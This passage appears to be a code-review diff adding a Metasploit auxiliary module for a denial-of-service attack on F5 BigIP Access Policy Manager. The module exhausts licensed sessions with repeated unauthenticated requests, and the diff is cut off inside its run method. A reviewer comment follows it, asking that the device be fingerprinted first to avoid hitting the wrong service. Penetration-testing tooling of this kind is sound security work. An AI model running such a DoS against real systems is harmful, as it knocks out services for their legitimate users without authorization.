modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb

```diff
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'F5 BigIP APM Unauthenticated Session Exhaustion Denial of Service',
+      'Description'    => %q{
+        An unauthenticated attacker can establish multiple connections with BigIP Access Policy Manager
+        and exhaust all available sessions defined in customer\'s license.
+        In the first step of BigIP APM protocol the client sends a HTTP request.
+        The BigIP system creates a session, marks it as progress (pending) and then redirects client to access policy URI.
+        Since BigIP allocates a new session after the first unauthenticated request and deletes the session only if an access policy timeout will be expired
+        the attacker can exhaust all available sessions repeatedly sending initial HTTP request.
+      },
+      'Author'         =>
+        [
+          'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',
+          'Nikita Oleksov <neoleksov[at]gmail.com>',
+          'Denis Kolegov <dnkolegov[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html']
+        ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' =>
+        {
+          'SSLVersion' => 'TLS1'
+        }
+    ))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The BigIP service port to listen on', 443]),
+        OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
+        OptInt.new('RLIMIT', [true, 'The number of requests to send', 10000])
+      ], self.class)
+  end
+
+  def run
+    # Main function
+    rlimit = datastore['RLIMIT']
+    proto = datastore['SSL'] ? 'https' : 'http'
+
+    # Send an initial test request
+    res = send_request_cgi('method' => 'GET', 'uri' => '/')
+    if res
```

Comment:
Worths to fingerprint the BigIP device if possible. To avoid running the DoS against any web service by error.